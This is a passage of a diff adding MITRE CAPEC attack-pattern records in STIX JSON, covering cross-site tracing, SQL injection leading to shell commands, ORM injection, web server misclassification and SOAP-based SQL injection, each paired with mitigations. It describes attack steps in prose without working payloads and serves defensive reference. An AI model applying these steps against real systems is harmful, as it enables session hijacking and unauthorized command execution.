HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system.\n In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim's browser (if they can trick the victim's into visiting their malicious website or clicking on the link that they supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if HTTP Trace is enabled: Determine if HTTP Trace is enabled at the web server with which the victim has an active session

    2. Techniques
    An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response.

Experiment

  1. Identify mechanism to launch HTTP Trace request: The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.

    2. Techniques
    The adversary probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request.

Exploit

  1. Create a malicious script that pings the web server with HTTP TRACE request: The adversary creates a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.

    2. Techniques
    The adversary's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response.

  2. Execute malicious HTTP Trace launching script: The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script

  3. Intercept HTTP TRACE response: The adversary's script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary.

", + "x_capec_extended_description": "\n The adversary uses an XSS attack to have victim's browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system's web server.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "HTTP TRACE is enabled on the web server", + "The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy", + "Scripting is enabled in the client's browser", + "HTTP is used as the communication protocol between the server and the client" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Understanding of the HTTP protocol and an ability to craft a malicious script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default.", + "id": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92929267-6931-47a1-b4dd-3fd1d012b7cf", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch web browser against known security origin policy bypass exploits.", + "id": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.", + "external_references": [ + { + "external_id": "CAPEC-108", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/108.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + } + ], + "id": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Command Line Execution through SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).\n Reference: https://www.cve.org/CVERecord?id=CVE-2006-6799\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query.

Exploit

  1. Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive: The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive.

  2. Inject malicious data in the database: Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument

  3. Trigger command line execution with injected arguments: The attacker causes execution of command line functionality which leverages previously injected database content as arguments.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application does not properly validate data before storing in the database", + "Backend application implicitly trusts the data stored in the database", + "Malicious data is used on the backend as a command line argument" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable MSSQL xp_cmdshell directive on the database", + "id": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb697224-7fb5-464b-bb81-e9cc28732c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate the data (syntactically and semantically) before writing it to the database.", + "id": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument).", + "id": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74092c9d-86c1-49c6-82cc-08e4da29ea92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.", + "external_references": [ + { + "external_id": "CAPEC-109", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/109.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-564", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/564.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-4", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection" + } + ], + "id": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Object Relational Mapping Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Persistence Framework Used: An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.

    2. Techniques
    An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there.

  2. Probe for ORM Injection vulnerabilities: The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content.

Exploit

  1. Perform SQL Injection through the generated data access layer: An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.

    2. Techniques
    An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An application uses data access layer generated by an ORM tool or framework", + "An application uses user supplied data in queries executed against the database", + "The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44a7c013-8531-4a05-b8fc-d49a59a09123", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application.", + "id": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d021b9f3-7bd8-4d7c-8e30-933d2cff35f6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process.", + "external_references": [ + { + "external_id": "CAPEC-11", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/11.html" + }, + { + "external_id": "CWE-430", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/430.html" + }, + { + "description": "Masquerading: Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204), SecurityFocus", + "external_id": "REF-6", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/bid/17204/info" + } + ], + "id": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cause Web Server Misclassification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.\n http://victim.site/login.jsp.\n Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.\n [REF-6]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Footprint file input vectors: Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.

    2. Techniques
    Attacker manually crawls application to identify file inputs
    Attacker uses an automated tool to crawl application identify file inputs
    Attacker manually assesses strength of access control protecting native application files from user control
    Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests

Experiment

  1. File misclassification shotgunning: An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.

    2. Techniques
    Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.
    Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server.

  2. File misclassification sniping: Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.

    3. Techniques
    Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.
    Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server.

Exploit

  1. Disclose information: The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).

    2. Techniques
    Manipulate the file names that are explicitly sent to the server.
    Manipulate the MIME sent in order to confuse the web server.
", + "x_capec_extended_description": "\n This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Web server software must rely on file name or file extension for processing.", + "The attacker must be able to make HTTP requests to the web server." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To modify file name or file extension", + "Medium": "To use misclassification to force the Web server to disclose configuration information, source, or binary data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Server routines should be determined by content not determined by filename or file extension.", + "id": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-11-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22b26b12-1eff-40ab-95ab-8de26f22b487", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "target_ref": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.", + "external_references": [ + { + "external_id": "CAPEC-110", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/110.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "SQL Injection through SOAP Parameter Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Incorrect SOAP Parameter Handling: The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.

    2. Techniques
    The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior.

Experiment

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query.

Exploit

  1. Inject SQL via SOAP Parameters: The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.

    2. Techniques
    An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SOAP messages are used as a communication mechanism in the system", + "SOAP parameters are not properly validated at the service provider", + "The service provider does not properly utilize parameter binding when building SQL queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "If the attacker has to perform Blind SQL Injection", + "Medium": "If the attacker is able to gain good understanding of the system's database schema" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate and sanitize/reject user input at the service provider.", + "id": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3a9b355-487c-4cfd-904c-055007648f78", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.", + "id": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecba2a2e-f73d-4937-9f4e-d8650932e41a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + 